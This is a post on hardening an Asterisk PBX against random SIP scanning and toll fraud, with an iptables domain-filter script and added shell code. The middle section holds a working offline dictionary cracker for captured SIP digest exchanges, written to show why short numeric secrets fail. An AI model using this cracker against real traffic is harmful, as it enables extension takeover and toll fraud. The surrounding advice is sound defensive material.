To start, it’s useful to know a little about the enemy. Attacks may be random, or targeting your system specifically.
Random attacks use automated tools to probe every IPv4 address. When something promising is found, a smarter robot and/or human skill is applied in an attempt to complete penetration. The motive is usually one of:
- Steal phone service, e.g. for resale in internet cafes or taxiphone shops.
- Make calls to premium numbers controlled by the attacker.
- Make telemarketing spam or scam calls.
- Mask communications used in planning or executing an unrelated crime.
Targeted attackers generally have no interest in toll fraud. Examples include:
- A competitor tries to obtain your customer list, designs, business plans or other IP.
- A disgruntled current or former employee seeks to sabotage your business.
- Your wife searches for your communications with your mistress.
The security playing field is overwhelmingly tilted in favor of the attacker. Your defense must succeed every time, but he has to succeed only once. An attacker with sufficient expertise and/or funds will surely breach your system. If you need to defend against a targeted attack, get professional assistance. Nothing that we discuss here will be adequate. The remainder of this post is about random attacks.
It is infeasible, even with a large botnet, to probe every port in IPv4 space. So, using an obscure SIP port can certainly help; in my experience it will reduce unwanted traffic by at least 95%. But, be careful: if your PBX previously responded to an attacker on port 5060, changing the port (with the same IP) won’t help; he’ll scan every port on your machine. Likewise, if your IAX port (or heaven forbid, your web admin port) is open, he knows you have a PBX and will probe all ports for SIP.
Filtering by domain name is very powerful. My preference is to do this in iptables rather than Asterisk. An attacker sending REGISTER, INVITE or OPTIONS without the ‘secret’ domain name gets no response at all; after a few attempts he moves on to the next sucker. Also, it’s more flexible because you can whitelist the addresses of trunking providers, which address your PBX by its numeric IP and so never send the domain name. Choose an obscure name and be sure that a reverse lookup of your IP address yields something different; otherwise the ‘secret’ is one PTR query away. See for example
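As an added illustration of the iptables approach (this is example code, not the ruleset from the original post), the script below builds a dedicated chain that whitelists trunk-provider addresses first, accepts SIP packets whose payload contains the secret domain, and silently drops the rest. The domain pbx7k2.example.net, the TEST-NET-3 provider addresses and the IPT/SIP_PORT variables are all hypothetical placeholders; setting IPT=echo gives a dry run.

```shell
#!/bin/sh
# Added example (not from the original post): a minimal iptables ruleset that
# lets SIP requests through only when they carry the PBX's secret domain name
# or come from a whitelisted trunk provider, and drops everything else silently.
# All names and addresses below are hypothetical; adjust to your own.
set -eu

IPT="${IPT:-iptables}"                              # set IPT=echo for a dry run
SIP_PORT="${SIP_PORT:-5060}"                        # put your obscure port here
SIP_DOMAIN="${SIP_DOMAIN:-pbx7k2.example.net}"      # the 'secret' domain the phones use
TRUNK_IPS="${TRUNK_IPS:-203.0.113.10 203.0.113.11}" # provider signalling IPs (TEST-NET-3)

sip_domain_filter() {
  # Dedicated chain: created if missing, emptied if it already exists
  $IPT -N SIP_IN 2>/dev/null || true
  $IPT -F SIP_IN

  # Everything arriving on the SIP port, UDP or TCP, goes through the chain.
  # (Assumes a fresh INPUT chain, e.g. run from a firewall script that flushes first.)
  $IPT -A INPUT -p udp --dport "$SIP_PORT" -j SIP_IN
  $IPT -A INPUT -p tcp --dport "$SIP_PORT" -j SIP_IN

  # Trunk providers address the PBX by IP and never send the domain, so they are
  # whitelisted by source address before the string match is consulted.
  for ip in $TRUNK_IPS; do
    $IPT -A SIP_IN -s "$ip" -j ACCEPT
  done

  # A REGISTER, INVITE or OPTIONS from one of our phones carries the domain in
  # its Request-URI and To/From headers; match it anywhere in the payload.
  $IPT -A SIP_IN -m string --icase --algo bm --string "$SIP_DOMAIN" -j ACCEPT

  # DROP, not REJECT: a scanner that gets nothing back cannot tell a PBX from a dead port.
  $IPT -A SIP_IN -j DROP
}

# Apply only when explicitly asked, so sourcing this file is harmless.
if [ "${1:-}" = "--apply" ]; then
  sip_domain_filter
fi
```

Two caveats a practitioner should keep in mind. The string match inspects one packet at a time, so it is reliable for SIP over UDP but not for a TCP stream split across segments (and it cannot see inside TLS at all). And the domain travels in cleartext, so this defeats scanners that never saw your traffic, not an attacker who can capture a phone's REGISTER.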
Once past the above defenses, the bad guys send two kinds of traffic: attempts to register an extension, and calls to numbers that might route externally. For the former, be sure that every extension has a password strong enough to resist offline cracking; there are several ways he might have obtained the hashed password (a captured REGISTER challenge and response, or a copied configuration or database dump), and against a hash a short numeric secret falls in seconds. For the latter, be sure that anonymous and guest calls are disallowed and (in case he gets past that) that the from-trunk and similar inbound contexts have no path to an arbitrary external number. (You should also check for DISA, voicemail and attended-transfer vulnerabilities, though an attacker would not need SIP access to exploit them; an ordinary inbound call suffices.)
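To make the "offline cracking" point concrete, here is an added example (not code from the original post) that computes a SIP digest response the way a phone does and then runs a dictionary attack against a captured challenge/response pair. It uses the no-qop MD5 digest form that Asterisk's default challenge asks for; the extension 1001, realm asterisk, nonce, domain and wordlist are all constructed for the demonstration.

```shell
#!/bin/sh
# Added example (not from the original post): compute the SIP digest response
# the way a phone does, then run an offline dictionary attack against a captured
# challenge/response pair. User, realm, nonce and wordlist below are constructed.
set -eu

_md5() {
  # lowercase hex MD5 of stdin; md5sum on Linux, openssl as a fallback
  if command -v md5sum >/dev/null 2>&1; then
    md5sum | cut -d' ' -f1
  else
    openssl dgst -md5 | sed 's/^.*= //'
  fi
}

# RFC 2617 digest without qop, the form Asterisk's default challenge asks for:
#   response = MD5( MD5(user:realm:password) : nonce : MD5(method:uri) )
# Everything except the password is visible on the wire, which is why one
# captured exchange is enough to attack the secret offline.
sip_digest_response() {
  d_user=$1 d_realm=$2 d_password=$3 d_method=$4 d_uri=$5 d_nonce=$6
  ha1=$(printf '%s:%s:%s' "$d_user" "$d_realm" "$d_password" | _md5)
  ha2=$(printf '%s:%s' "$d_method" "$d_uri" | _md5)
  printf '%s:%s:%s' "$ha1" "$d_nonce" "$ha2" | _md5
}

# Offline attack: recompute the response for every candidate in a wordlist and
# compare with the captured one. Prints the password and returns 0 on a hit.
crack_sip_digest() {
  c_user=$1 c_realm=$2 c_method=$3 c_uri=$4 c_nonce=$5 c_target=$6 c_wordlist=$7
  while IFS= read -r candidate; do
    if [ "$(sip_digest_response "$c_user" "$c_realm" "$candidate" \
             "$c_method" "$c_uri" "$c_nonce")" = "$c_target" ]; then
      printf '%s\n' "$candidate"
      return 0
    fi
  done < "$c_wordlist"
  return 1
}

# Constructed REGISTER exchange: extension 1001, Asterisk's default realm and a
# nonce as it would appear in the 401 challenge. The wordlist is a toy; real
# attackers use millions of entries plus numeric brute force.
demo_offline_crack() {
  wl=$(mktemp)
  printf '%s\n' 0000 1111 1234 password 1001 letmein > "$wl"

  weak=$(sip_digest_response 1001 asterisk 1234 REGISTER sip:pbx7k2.example.net 4f8a9c2b)
  if crack_sip_digest 1001 asterisk REGISTER sip:pbx7k2.example.net 4f8a9c2b "$weak" "$wl"; then
    echo "weak secret recovered from the captured exchange"
  fi

  strong=$(sip_digest_response 1001 asterisk 'gX7!r2Qp#vL9zT' REGISTER sip:pbx7k2.example.net 4f8a9c2b)
  if ! crack_sip_digest 1001 asterisk REGISTER sip:pbx7k2.example.net 4f8a9c2b "$strong" "$wl"; then
    echo "strong secret not in wordlist; attacker is left with the full keyspace"
  fi
  rm -f "$wl"
}

if [ "${1:-}" = "--demo" ]; then
  demo_offline_crack
fi
```

Run it with --demo to see the weak secret fall and the strong one survive. The same arithmetic applies to a leaked md5secret or database dump: nothing in the hash slows the attacker down, so the only defence on this axis is a long, random secret per extension.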
Fail2ban rarely prevents an actual breach: if the password is known, the bad guy gets in; if not (and it’s strong), a billion attempts won’t help him. However, it’s useful for alerting you to problems earlier in the chain, for reducing unwanted load on the system, and for removing log clutter that could prevent you from spotting other trouble.
In case all of the above fail, having some restrictions in the system is useful, e.g. blocking countries that you don’t normally call, or protecting those routes with a password.
Also, take advantage of the fraud controls offered by your trunking providers. To protect their own network, providers typically impose limits on the number of concurrent calls, calls per second and maximum monthly spend. If these are higher than you need, ask them to reduce the limits for your account. If you auto-recharge, there may be an option to limit the frequency. You may also have the option to block calls exceeding a specified per-minute rate, or calls to specific regions or countries. And, if they have a ‘minimum balance for outgoing calls’, set that high enough so that if all hell breaks loose and your account is drained, your incoming calls will still work while you resolve the issue.